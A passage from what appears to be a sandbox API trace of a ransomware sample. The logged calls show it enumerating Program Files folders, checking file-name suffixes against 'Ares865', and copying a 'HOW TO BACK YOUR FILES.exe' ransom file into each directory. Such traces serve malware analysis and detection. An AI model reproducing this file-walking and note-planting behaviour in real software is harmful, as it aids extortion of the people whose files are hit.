(in: lpString1=0x2e2e8aa, lpString2="jpicom.dll" | out: lpString1="jpicom.dll") returned="jpicom.dll" [0056.418] lstrlenW (lpString="jpicom.dll") returned 10 [0056.418] lstrlenW (lpString="Ares865") returned 7 [0056.418] lstrcmpiW (lpString1="com.dll", lpString2="Ares865") returned 1 [0056.418] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="jpiexp.dll" | out: lpString1="jpiexp.dll") returned="jpiexp.dll" [0056.418] lstrlenW (lpString="jpiexp.dll") returned 10 [0056.418] lstrlenW (lpString="Ares865") returned 7 [0056.418] lstrcmpiW (lpString1="exp.dll", lpString2="Ares865") returned 1 [0056.418] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="jpinscp.dll" | out: lpString1="jpinscp.dll") returned="jpinscp.dll" [0056.419] lstrlenW (lpString="jpinscp.dll") returned 11 [0056.419] lstrlenW (lpString="Ares865") returned 7 [0056.419] lstrcmpiW (lpString1="scp.dll", lpString2="Ares865") returned 1 [0056.419] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="jpioji.dll" | out: lpString1="jpioji.dll") returned="jpioji.dll" [0056.419] lstrlenW (lpString="jpioji.dll") returned 10 [0056.419] lstrlenW (lpString="Ares865") returned 7 [0056.419] lstrcmpiW (lpString1="oji.dll", lpString2="Ares865") returned 1 [0056.419] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="jpishare.dll" | out: lpString1="jpishare.dll") returned="jpishare.dll" [0056.419] lstrlenW (lpString="jpishare.dll") returned 12 [0056.419] lstrlenW (lpString="Ares865") returned 7 [0056.419] lstrcmpiW (lpString1="are.dll", lpString2="Ares865") returned -1 [0056.419] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="jqs.exe" | out: lpString1="jqs.exe") returned="jqs.exe" [0056.419] lstrlenW (lpString="jqs.exe") returned 7 [0056.419] lstrlenW (lpString="Ares865") returned 7 [0056.419] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="jsdt.dll" | out: lpString1="jsdt.dll") returned="jsdt.dll" [0056.419] lstrlenW (lpString="jsdt.dll") returned 8 [0056.419] lstrlenW (lpString="Ares865") returned 7 [0056.419] lstrcmpiW (lpString1="sdt.dll", lpString2="Ares865") returned 1 [0056.419] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="jsound.dll" | out: lpString1="jsound.dll") returned="jsound.dll" [0056.419] lstrlenW (lpString="jsound.dll") returned 10 [0056.420] lstrlenW (lpString="Ares865") returned 7 [0056.420] lstrcmpiW (lpString1="und.dll", lpString2="Ares865") returned 1 [0056.420] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="jsoundds.dll" | out: lpString1="jsoundds.dll") returned="jsoundds.dll" [0056.420] lstrlenW (lpString="jsoundds.dll") returned 12 [0056.420] lstrlenW (lpString="Ares865") returned 7 [0056.420] lstrcmpiW (lpString1="dds.dll", lpString2="Ares865") returned 1 [0056.420] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="kcms.dll" | out: lpString1="kcms.dll") returned="kcms.dll" [0056.420] lstrlenW (lpString="kcms.dll") returned 8 [0056.420] lstrlenW (lpString="Ares865") returned 7 [0056.420] lstrcmpiW (lpString1="cms.dll", lpString2="Ares865") returned 1 [0056.420] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="keytool.exe" | out: lpString1="keytool.exe") returned="keytool.exe" [0056.420] lstrlenW (lpString="keytool.exe") returned 11 [0056.420] lstrlenW (lpString="Ares865") returned 7 [0056.420] lstrcmpiW (lpString1="ool.exe", lpString2="Ares865") returned 1 [0056.420] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="kinit.exe" | out: lpString1="kinit.exe") returned="kinit.exe" [0056.420] lstrlenW (lpString="kinit.exe") returned 9 [0056.420] lstrlenW (lpString="Ares865") returned 7 [0056.420] lstrcmpiW (lpString1="nit.exe", lpString2="Ares865") returned 1 [0056.420] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="klist.exe" | out: lpString1="klist.exe") returned="klist.exe" [0056.420] lstrlenW (lpString="klist.exe") returned 9 [0056.420] lstrlenW (lpString="Ares865") returned 7 [0056.420] lstrcmpiW (lpString1="ist.exe", lpString2="Ares865") returned 1 [0056.420] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="ktab.exe" | out: lpString1="ktab.exe") returned="ktab.exe" [0056.420] lstrlenW (lpString="ktab.exe") returned 8 [0056.421] lstrlenW (lpString="Ares865") returned 7 [0056.421] lstrcmpiW (lpString1="tab.exe", lpString2="Ares865") returned 1 [0056.421] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="libxml2.dll" | out: lpString1="libxml2.dll") returned="libxml2.dll" [0056.421] lstrlenW (lpString="libxml2.dll") returned 11 [0056.421] lstrlenW (lpString="Ares865") returned 7 [0056.421] lstrcmpiW (lpString1="ml2.dll", lpString2="Ares865") returned 1 [0056.421] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="libxslt.dll" | out: lpString1="libxslt.dll") returned="libxslt.dll" [0056.421] lstrlenW (lpString="libxslt.dll") returned 11 [0056.421] lstrlenW (lpString="Ares865") returned 7 [0056.421] lstrcmpiW (lpString1="slt.dll", lpString2="Ares865") returned 1 [0056.421] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="management.dll" | out: lpString1="management.dll") returned="management.dll" [0056.421] lstrlenW (lpString="management.dll") returned 14 [0056.421] lstrlenW (lpString="Ares865") returned 7 [0056.421] lstrcmpiW (lpString1="ent.dll", lpString2="Ares865") returned 1 [0056.421] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="mlib_image.dll" | out: lpString1="mlib_image.dll") returned="mlib_image.dll" [0056.421] lstrlenW (lpString="mlib_image.dll") returned 14 [0056.421] lstrlenW (lpString="Ares865") returned 7 [0056.421] lstrcmpiW (lpString1="age.dll", lpString2="Ares865") returned -1 [0056.421] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="msvcr100.dll" | out: lpString1="msvcr100.dll") returned="msvcr100.dll" [0056.421] lstrlenW (lpString="msvcr100.dll") returned 12 [0056.421] lstrlenW (lpString="Ares865") returned 7 [0056.421] lstrcmpiW (lpString1="100.dll", lpString2="Ares865") returned -1 [0056.421] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="net.dll" | out: lpString1="net.dll") returned="net.dll" [0056.421] lstrlenW (lpString="net.dll") returned 7 [0056.422] lstrlenW (lpString="Ares865") returned 7 [0056.422] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="nio.dll" | out: lpString1="nio.dll") returned="nio.dll" [0056.422] lstrlenW (lpString="nio.dll") returned 7 [0056.422] lstrlenW (lpString="Ares865") returned 7 [0056.422] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="npjpi170_45.dll" | out: lpString1="npjpi170_45.dll") returned="npjpi170_45.dll" [0056.422] lstrlenW (lpString="npjpi170_45.dll") returned 15 [0056.422] lstrlenW (lpString="Ares865") returned 7 [0056.422] lstrcmpiW (lpString1="_45.dll", lpString2="Ares865") returned -1 [0056.422] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="npoji610.dll" | out: lpString1="npoji610.dll") returned="npoji610.dll" [0056.423] lstrlenW (lpString="npoji610.dll") returned 12 [0056.423] lstrlenW (lpString="Ares865") returned 7 [0056.423] lstrcmpiW (lpString1="610.dll", lpString2="Ares865") returned -1 [0056.423] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="npt.dll" | out: lpString1="npt.dll") returned="npt.dll" [0056.423] lstrlenW (lpString="npt.dll") returned 7 [0056.423] lstrlenW (lpString="Ares865") returned 7 [0056.423] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="orbd.exe" | out: lpString1="orbd.exe") returned="orbd.exe" [0056.423] lstrlenW (lpString="orbd.exe") returned 8 [0056.423] lstrlenW (lpString="Ares865") returned 7 [0056.423] lstrcmpiW (lpString1="rbd.exe", lpString2="Ares865") returned 1 [0056.423] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="pack200.exe" | out: lpString1="pack200.exe") returned="pack200.exe" [0056.423] lstrlenW (lpString="pack200.exe") returned 11 [0056.423] lstrlenW (lpString="Ares865") returned 7 [0056.423] lstrcmpiW (lpString1="200.exe", lpString2="Ares865") returned -1 [0056.423] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="plugin2" | out: lpString1="plugin2") returned="plugin2" [0056.423] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0056.423] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5a) returned 0x2f2098 [0056.423] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7b50 | out: ListHead=0x2e77d0, ListEntry=0x2e7b50) returned 0x2e7b30 [0056.423] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x744249a0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x744249a0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x744249a0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x3da8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="policytool.exe", cAlternateFileName="POLICY~1.EXE")) returned 1 [0056.423] lstrcmpiW (lpString1="policytool.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.423] lstrcmpiW (lpString1="policytool.exe", lpString2="aoldtz.exe") returned 1 [0056.423] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="policytool.exe" | out: lpString1="policytool.exe") returned="policytool.exe" [0056.423] lstrlenW (lpString="policytool.exe") returned 14 [0056.423] lstrlenW (lpString="Ares865") returned 7 [0056.423] lstrcmpiW (lpString1="ool.exe", lpString2="Ares865") returned 1 [0056.424] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="prism-d3d.dll" | out: lpString1="prism-d3d.dll") returned="prism-d3d.dll" [0056.424] lstrlenW (lpString="prism-d3d.dll") returned 13 [0056.424] lstrlenW (lpString="Ares865") returned 7 [0056.424] lstrcmpiW (lpString1="d3d.dll", lpString2="Ares865") returned 1 [0056.424] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="rmid.exe" | out: lpString1="rmid.exe") returned="rmid.exe" [0056.424] lstrlenW (lpString="rmid.exe") returned 8 [0056.424] lstrlenW (lpString="Ares865") returned 7 [0056.424] lstrcmpiW (lpString1="mid.exe", lpString2="Ares865") returned 1 [0056.424] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="rmiregistry.exe" | out: lpString1="rmiregistry.exe") returned="rmiregistry.exe" [0056.424] lstrlenW (lpString="rmiregistry.exe") returned 15 [0056.424] lstrlenW (lpString="Ares865") returned 7 [0056.424] lstrcmpiW (lpString1="try.exe", lpString2="Ares865") returned 1 [0056.424] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="servertool.exe" | out: lpString1="servertool.exe") returned="servertool.exe" [0056.424] lstrlenW (lpString="servertool.exe") returned 14 [0056.424] lstrlenW (lpString="Ares865") returned 7 [0056.424] lstrcmpiW (lpString1="ool.exe", lpString2="Ares865") returned 1 [0056.424] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="splashscreen.dll" | out: lpString1="splashscreen.dll") returned="splashscreen.dll" [0056.424] lstrlenW (lpString="splashscreen.dll") returned 16 [0056.424] lstrlenW (lpString="Ares865") returned 7 [0056.424] lstrcmpiW (lpString1="een.dll", lpString2="Ares865") returned 1 [0056.424] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="ssv.dll" | out: lpString1="ssv.dll") returned="ssv.dll" [0056.424] lstrlenW (lpString="ssv.dll") returned 7 [0056.424] lstrlenW (lpString="Ares865") returned 7 [0056.425] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="ssvagent.exe" | out: lpString1="ssvagent.exe") returned="ssvagent.exe" [0056.425] lstrlenW (lpString="ssvagent.exe") returned 12 [0056.425] lstrlenW (lpString="Ares865") returned 7 [0056.425] lstrcmpiW (lpString1="ent.exe", lpString2="Ares865") returned 1 [0056.425] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="sunec.dll" | out: lpString1="sunec.dll") returned="sunec.dll" [0056.425] lstrlenW (lpString="sunec.dll") returned 9 [0056.425] lstrlenW (lpString="Ares865") returned 7 [0056.425] lstrcmpiW (lpString1="nec.dll", lpString2="Ares865") returned 1 [0056.425] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="sunmscapi.dll" | out: lpString1="sunmscapi.dll") returned="sunmscapi.dll" [0056.425] lstrlenW (lpString="sunmscapi.dll") returned 13 [0056.425] lstrlenW (lpString="Ares865") returned 7 [0056.425] lstrcmpiW (lpString1="api.dll", lpString2="Ares865") returned -1 [0056.425] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2") returned="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2" [0056.425] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2098 | out: hHeap=0x2b0000) returned 1 [0056.425] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0056.425] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2") returned 44 [0056.425] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2") returned="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2" [0056.425] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.425] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\plugin2\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.438] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.438] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x744249a0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x532380a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x532380a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.438] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.438] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.439] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin") returned="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin" [0056.439] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0056.439] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0056.439] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin") returned 45 [0056.439] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin") returned="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin" [0056.439] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.439] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dtplugin\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.445] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.445] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x743b2580, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x5325e200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5325e200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.445] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.445] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.445] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Java\\jre7\\bin\\client", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\bin\\client") returned="C:\\Program Files (x86)\\Java\\jre7\\bin\\client" [0056.446] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df770 | out: hHeap=0x2b0000) returned 1 [0056.446] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0056.446] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\bin\\client") returned 43 [0056.446] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\bin\\client" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\bin\\client") returned="C:\\Program Files (x86)\\Java\\jre7\\bin\\client" [0056.446] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.446] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.451] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.451] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x743b2580, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x5325e200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5325e200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.451] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.451] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.451] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Internet Explorer") returned="C:\\Program Files (x86)\\Internet Explorer" [0056.451] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df710 | out: hHeap=0x2b0000) returned 1 [0056.452] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0056.452] lstrlenW (lpString="C:\\Program Files (x86)\\Internet Explorer") returned 40 [0056.452] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Internet Explorer" | out: lpString1="C:\\Program Files (x86)\\Internet Explorer") returned="C:\\Program Files (x86)\\Internet Explorer" [0056.452] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.452] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.456] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.456] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x53284360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53284360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.456] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.456] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.457] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP") returned="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP" [0056.457] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2098 | out: hHeap=0x2b0000) returned 1 [0056.457] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0056.457] lstrlenW (lpString="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP") returned 47 [0056.457] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP" | out: lpString1="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP") returned="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP" [0056.457] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.457] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\internet explorer\\signup\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.461] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.461] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x53284360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53284360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.461] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.461] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.462] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Internet Explorer\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Internet Explorer\\en-US") returned="C:\\Program Files (x86)\\Internet Explorer\\en-US" [0056.462] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0056.462] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0056.462] lstrlenW (lpString="C:\\Program Files (x86)\\Internet Explorer\\en-US") returned 46 [0056.462] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Internet Explorer\\en-US" | out: lpString1="C:\\Program Files (x86)\\Internet Explorer\\en-US") returned="C:\\Program Files (x86)\\Internet Explorer\\en-US" [0056.462] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.462] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.466] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.466] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x53284360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53284360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.467] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.467] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.467] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Google", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google") returned="C:\\Program Files (x86)\\Google" [0056.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6090 | out: hHeap=0x2b0000) returned 1 [0056.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0056.467] lstrlenW (lpString="C:\\Program Files (x86)\\Google") returned 29 [0056.467] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google" | out: lpString1="C:\\Program Files (x86)\\Google") returned="C:\\Program Files (x86)\\Google" [0056.467] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.467] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.472] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.472] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x532aa4c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x532aa4c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.472] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.472] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.472] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files 